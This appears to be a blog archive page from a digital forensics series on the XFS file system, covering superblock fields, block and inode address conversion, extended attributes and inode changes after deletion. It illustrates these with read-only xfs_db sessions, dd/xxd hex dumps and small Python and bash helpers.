This attribute holds the SELinux context on our file, “unconfined_u:object_r:admin_home_t:s0”. While extended attribute values are not required to be null-terminated, SELinux expects its context labels to have null terminators. So the 38 byte value length is 37 printable characters and a null.
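
Parsing the resident attribute structures is straightforward. Here’s a Python sketch (offsets are relative to the start of the attribute fork; the function name is mine):

import struct

def parse_shortform_attrs(buf):
    """Parse short form extended attributes from the inode attribute fork."""
    totsize, count = struct.unpack_from(">HB", buf, 0)
    off, attrs = 4, []                    # skip 4 byte header (1 pad byte)
    for _ in range(count):
        namelen, valuelen, flags = buf[off], buf[off + 1], buf[off + 2]
        name = buf[off + 3 : off + 3 + namelen].decode()
        value = buf[off + 3 + namelen : off + 3 + namelen + valuelen]
        attrs.append((name, flags, value))
        off += 3 + namelen + valuelen
    return attrs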

The flags field is designed to control access to the attribute information. The flags byte is defined as a bit mask, but only four values appear to be used currently:

   128   Attribute is being updated
     4   "Secure" - attribute may be viewed by all but only set by root
     2   "Trusted" - attribute may only be viewed and set by root
     0   No restrictions

The Inode After Deletion

When a file is deleted, changes are limited to a small number of fields in the inode core:

  • The 2 byte file type and permissions field is zeroed
  • Link count, file size, number of blocks, and number of extents are zeroed
  • ctime is set to the time the file was deleted
  • The offset to the extended attributes is zeroed
  • The data fork and extended attribute type bytes are set to 2, which would normally mean an extent array
  • The “Generation number” field (inode bytes 92-95) is incremented–more testing is required, but it appears this field may be a usage count for the inode
  • The CRC32 checksum and the LSN are updated

No other data in the inode changes. So while the number of extents value is zeroed and so is the offset to the start of the extended attributes, the actual extent and attribute data remains in the inode.

This means it should be straightforward to recover the original file by parsing whatever extent data exists starting at inode offset 176. The XFS FAQ points to two Open Source projects that appear to use this idea to recover deleted files, and a little Google searching turns up several commercial tools that claim to do XFS file recovery.

I have not had the opportunity to test any of these tools.

In limited testing it also appears that the data fork and the extended attribute information are not zeroed when the inode is reused. This means there is the possibility of finding remnants of data from a previous file in the unused or “slack” space in the inode.

Using xfs_db to View Inodes

xfs_db allows you to quickly view the inode values, even for inodes that are currently unallocated:

[root@localhost ~]# xfs_db -r /dev/mapper/centos-root
xfs_db> inode 100799719
xfs_db> print
core.magic = 0x494e
core.mode = 0
core.version = 3
core.format = 2 (extents)
core.nlinkv2 = 0
core.onlink = 0
core.projid_lo = 0
core.projid_hi = 0
core.uid = 0
core.gid = 0
core.flushiter = 0
core.atime.sec = Thu May 17 16:41:15 2018
core.atime.nsec = 821506703
core.mtime.sec = Thu May 17 16:41:15 2018
core.mtime.nsec = 821506703
core.ctime.sec = Thu May 17 22:10:07 2018
core.ctime.nsec = 163429238
[... additional output not shown...]

xfs_db even converts the timestamps for you, so that’s a win.

What’s Next?

XFS does not store file name information in the inode, which is pretty typical for Unix file systems. The only place where file names exist is in directory entries. In our next installment we will begin to examine the different XFS directory types. Yes, it’s complicated.

XFS (Part 1) – The Superblock

The XFS file system was originally developed by Silicon Graphics for their IRIX operating system. The Linux version is increasingly popular– Red Hat has adopted XFS as their default file system as of Red Hat Enterprise Linux v7. Unfortunately, while XFS is becoming more common on Linux systems, we are lacking forensic tools for decoding this file system. This series will provide insights into the XFS file system structures for forensics professionals, and document the current state of the art as far as tools for decoding XFS.

I would like to thank the XFS development community for their work on the file system and their help in preparing these articles. Links to the documentation, source code, and the mailing list are available from XFS.org. I wouldn’t have been able to do any of this work without these resources.

A Quick Overview of XFS

XFS is a modern journaled file system which uses extent-based file allocation and B+Tree style directories. XFS supports arbitrary extended file attributes. Inodes are dynamically allocated. The block size is 4K by default, but can be set to other values at file system creation time. All file system metadata is stored in “big endian” format, regardless of processor architecture.

Some of the structures in XFS are recognizable from older Unix file systems. XFS still uses 32-bit signed Unix epoch style timestamps, and has the “Year 2038” rollover problem as a result. XFS v5– the version currently used in Linux– does have a creation date (btime) field in addition to the normal last modified (mtime), access time (atime), and metadata change time (ctime) timestamps. XFS timestamps also have an additional 32-bit nanosecond resolution element. File type and permissions are stored in a packed 16-bit value, just like in older Unix file systems.

Very little data gets overwritten when files are deleted in XFS. Directory entries are simply marked as unused, and the extent data in the inode is still visible after deletion. File recovery should be straightforward.

In addition, standard metadata structures in XFS v5 contain a consistent unique file system UUID value, along with information like the inode value associated with the data structure. Metadata structures also have unique “magic number” values. These features facilitate file system and data recovery, and are very useful when carving or viewing raw file system data. Metadata structures include a CRC32 checksum to help detect corruption.

One interesting feature of XFS is that a single file system is subdivided into multiple Allocation Groups– four by default on RHEL systems. Each allocation group (AG) can be treated as a separate file system with its own inode and block lists. The intent is to let multiple threads write to the same file system in parallel with minimal contention, which makes XFS a high-performance file system on multi-core systems.

It also leads to a unique addressing scheme for blocks and inodes that combines the AG number with a relative block or inode offset within that AG. These values are packed together into a single address, normally stored as a 64-bit value. However, the number of bits used for the relative portion and for the AG number varies from file system to file system, as we will discuss below. In other words, it's complicated.

The Superblock

As with other Unix file systems, XFS starts with a superblock which helps decode the file system. The superblock occupies the first 512 bytes of each XFS AG. The primary superblock is the one in AG 0 at the front of the file system, with the superblocks in the other AGs used for redundancy.
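
Before decoding the fields, it can be handy to pull those raw bytes up in a hex dump. A one-liner against my test system does the trick (only the first output line is shown here; it matches the magic number, block size, and total block count fields decoded below):

[root@localhost XFS]# dd if=/dev/mapper/centos-root bs=512 count=1 2>/dev/null | xxd
0000000: 5846 5342 0000 1000 0000 0000 0094 2400  XFSB..........$.
[...]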

Only the first 272 bytes of the superblock are currently used. Here is a breakdown of the information from the superblock:

XFS AG0 Superblock

0-3      Magic Number                       "XFSB"
4-7      Block Size (in bytes)              0x1000 = 4096
8-15     Total blocks in file system        0x942400 = 9,708,544

16-23    Num blocks in real-time device     zeroed
24-31    Num extents in real-time device    zeroed

32-47    UUID                               e56c3b41-...-dd609cb7da71

48-55    First block of journal             0x800004 = 8388612
56-63    Root directory's inode             0x40 = 64

64-71    Real-time extents bitmap inode     0x41 = 65
72-79    Real-time bitmap summary inode     0x42 = 66

80-83    Real-time extent size (in blocks)  0x01
84-87    AG size (in blocks)                0x250900 = 2,427,136 (c.f. 8-15)
88-91    Number of AGs                      0x04
92-95    Num of real-time bitmap blocks     zeroed

96-99    Num of journal blocks              0x1284 = 4740
100-101  File system version and flags      0xB4B5 (low nibble is the version, 5)
102-103  Sector size                        0x200 = 512
104-105  Inode size                         0x200 = 512
106-107  Inodes/block                       0x08
108-119  File system name                   not set-- zeroed
120      log2(block size)                   0x0C (2^12 = 4096)
121      log2(sector size)                  0x09 (2^9 = 512)
122      log2(inode size)                   0x09 (2^9 = 512)
123      log2(inodes/block)                 0x03 (2^3 = 8 inodes/block)
124      log2(AG size) rounded up           0x16 (2^22 = 4,194,304 > 2,427,136)
125      log2(real-time extents)            zeroed
126      File system being created flag     zeroed
127      Max inode percentage               0x19 = 25%

128-135  Number of allocated inodes         0x2C500 = 181504
136-143  Number of free inodes              0x385 = 901

144-151  Number of free blocks              0x8450dc = 8,671,452
152-159  Number of free real-time extents   zeroed

160-167  User quota inode                   -1 (NULL in XFS)
168-175  Group quota inode                  -1 (NULL in XFS)

176-177  Quota flags                        zero
178      Misc flags                         zero
179      Reserved                           Must be zero
180-183  Inode alignment (in blocks)        0x04
184-187  RAID unit (in blocks)              zeroed
188-191  RAID stripe (in blocks)            zeroed

192      log2(dir blk allocation granularity)         zero
193      log2(sector size of external journal device)  zero
194-195  Sector size of external journal device       zero
196-199  Stripe/unit size of external journal device  0x01
200-203  Additional flags                             0x018A
204-207  Repeat additional flags (for alignment)      0x018A

/* Version 5 only */
208-211  Read-write feature flags (not used)          zero
212-215  Read-only feature flags                      zero
216-219  Read-write incompatibility flags             0x01
220-223  Read-write incompat flags for log (unused)   zero

224-227  CRC32 checksum for superblock                0x0A5832D0
228-231  Sparse inode alignment                       zero
232-239  Project quota inode                          -1

240-247  Log seq number of last superblock update     0x19000036EA
248-263  UUID used if INCOMPAT_META_UUID feature      zeroed
264-271  If INCOMPAT_META_RMAPBT, inode of RM btree   zeroed

Rather than discussing all of these fields in detail, I am going to focus on the fields we need to quickly get into the file system.

First we need basic file system structure size information like the block size (bytes 4-7) and inode size (bytes 104-105). XFS v5 defaults to 4K blocks and 512 byte inodes, which is what we see here.

As we'll discuss below, the number of AGs (bytes 88-91) and the size of each AG in blocks (bytes 84-87) are critical for locating data on the storage device. This file system has 4 AGs, each containing 2,427,136 blocks (roughly 9.9GB per AG, or just under 40GB for the file system).
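
A quick bit of shell arithmetic confirms those numbers:

[root@localhost XFS]# echo $(( 2427136 * 4096 ))        # bytes per AG
9941549056
[root@localhost XFS]# echo $(( 4 * 2427136 * 4096 ))    # bytes in the file system
39766196224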

The superblock contains the inode number of the root directory (bytes 56-63)– this value is normally 64. We also find the starting block of the file system journal (bytes 48-55) and the journal length in blocks (bytes 96-99). We’ll cover the journal in a later article in this series.

While looking at file system metadata in a hex editor is always fun, XFS does include a program named xfs_db which allows for more convenient decoding of various file system structures. Here’s an example of using xfs_db to decode the superblock of our example file system:

[root@localhost XFS]# xfs_db -r /dev/mapper/centos-root
xfs_db> sb 0
xfs_db> print
magicnum = 0x58465342
blocksize = 4096
dblocks = 9708544
rblocks = 0
rextents = 0
uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
[...]

“xfs_db -r” allows read-only access to mounted file systems. The “sb 0” command selects the superblock from AG 0. “print” has a built-in template to automatically parse and display the superblock information.

Inode and Block Addressing

Typically XFS metadata uses “absolute” addresses, which contain both AG information and a relative offset from the start of that AG. This is what we find here in the superblock and in directory files. Sometimes XFS will use “AG relative” addresses that only include the relative offset from the start of the AG.

While XFS typically allocates 64 bits to hold absolute addresses, the actual size of the address fields varies depending on the size of the file system. For block addresses, the number of bits in the "AG relative" portion of the address is the log2(AG size) value found in superblock byte 124. In our example superblock this value is 22, so the lower 22 bits of a block address hold the relative block offset, and the upper bits hold the AG number.

The first block of the file system journal is at address 0x800004. Let’s write that out in binary showing the AG and relative block offset portions:

     0x800004   =    1000 0000 0000 0000 0000 0100
AG# in upper 2 bits---/\---22 bits of relative block offset

So the journal starts at relative block offset 4 from the beginning of AG 2.
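
The same decomposition is easy to script if you need to do it repeatedly. Here is a minimal bash sketch, assuming the 22-bit relative offset from our example superblock:

addr=0x800004                                # absolute block address to decode
agshift=22                                   # log2(AG size), superblock byte 124
agno=$(( addr >> agshift ))                  # upper bits are the AG number
agblock=$(( addr & ((1 << agshift) - 1) ))   # lower 22 bits are the relative offset
echo "AG $agno, relative block $agblock"     # prints: AG 2, relative block 4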

But where is that in terms of a physical block offset? The physical block offset can be calculated as follows:

(AG number) * (blocks per AG) + (relative block offset)
     2      *    2427136      +         4   =    4854276

We could perform this calculation on the Linux command line and use dd to extract the first block of the journal:

[root@localhost XFS]# dd if=/dev/mapper/centos-root bs=4096 \
       skip=$((2*2427136 + 4)) count=1 | xxd
0000000: 0000 0021 0000 0000 6901 0000 071a 4dba  ...!....i.....M.
0000010: 0000 0010 6900 0000 4e41 5254 2800 0000  ....i...NART(...
[...]

Inode addressing is similar. However, because we can have multiple inodes per block, the relative portion of the inode address has to be longer. The length of relative inode addresses is the sum of superblock bytes 123 and 124– the log2 value of inodes per block plus the log2 value of blocks per AG. In our example this is 3+22=25.

The inode address of the root directory isn’t a very interesting example– it’s just inode offset 64 from AG 0. For a more interesting example, I’ll use my /etc/passwd file at inode 67761631 (0x409f5df). Let’s take a look at the bits:

     0x409f5df   =    0100 0000 1001 1111 0101 1101 1111
  AG# in upper 3 bits---/\---25 bits of relative inode

So the /etc/passwd file uses inode 0x9f5df (652767) in AG 2.

Where does this inode physically reside on the storage device? The relative block location of an inode in XFS is simply the integer portion of the inode number divided by the number of inodes per block. In our case this is 652767 div 8, or block 81595. The inode offset within this block is 652767 mod 8, which equals 7.
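
The whole chain of calculations can be scripted the same way. A bash sketch using this file system's geometry (the shift of 25 and the constants 8 and 2427136 all come from our superblock):

ino=67761631                                 # inode number to locate
inoshift=25                                  # log2(inodes/block) + log2(AG size)
agno=$(( ino >> inoshift ))                  # AG 2
agino=$(( ino & ((1 << inoshift) - 1) ))     # relative inode 652767
agblock=$(( agino / 8 ))                     # relative block 81595
slot=$(( agino % 8 ))                        # offset 7 within that block
physblock=$(( agno * 2427136 + agblock ))    # physical block 4935867
echo "physical block $physblock, inode offset $slot"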

Now that we know the AG and relative block number for this inode, we can extract it as we did the first block of the journal. We can even use a second dd command to extract the correct inode offset from the block:

[root@localhost XFS]# dd if=/dev/mapper/centos-root bs=4096 \
                              skip=$((2*2427136 + 81595)) count=1 |
                      dd bs=512 skip=7 count=1 | xxd
0000000: 494e 81a4 0302 0000 0000 0000 0000 0000  IN..............
0000010: 0000 0001 0000 0000 0000 0000 0000 0000  ................
[...]

Note that the xfs_db program can perform address conversions for us. However, in order to use xfs_db it must be able to attach to the file system so that it knows the correct length of the AG relative portion of the address. Since this may not always be possible, knowing how to manually convert absolute addresses is definitely a useful skill.

Here is how to get xfs_db to convert the block and inode addresses we used in the examples above:

[root@localhost XFS]# xfs_db -r /dev/mapper/centos-root
xfs_db> convert fsblock 0x800004 agno
0x2 (2)
xfs_db> convert fsblock 0x800004 agblock
0x4 (4)
xfs_db> convert inode 67761631 agno
0x2 (2)
xfs_db> convert inode 67761631 agino
0x9f5df (652767)
xfs_db> convert inode 67761631 agblock
0x13ebb (81595)
xfs_db> convert inode 67761631 offset
0x7 (7)

The first two commands convert the starting block of the journal (xfs_db refers to absolute block addresses as “fsblock” values) to the AG number (agno) and AG relative block offset (agblock). We can also use the convert command to translate inode addresses. Here we calculate the AG number, AG relative inode (agino), the AG relative block for the inode, and even the offset in that block where the inode resides (offset). The values from xfs_db match the values we calculated manually above. You will note that we can use either hex or decimal numbers as input.

Now that we can locate file system structures on disk, Part 2 of this series will focus on the XFS inode format. I hope you will return for the next installment.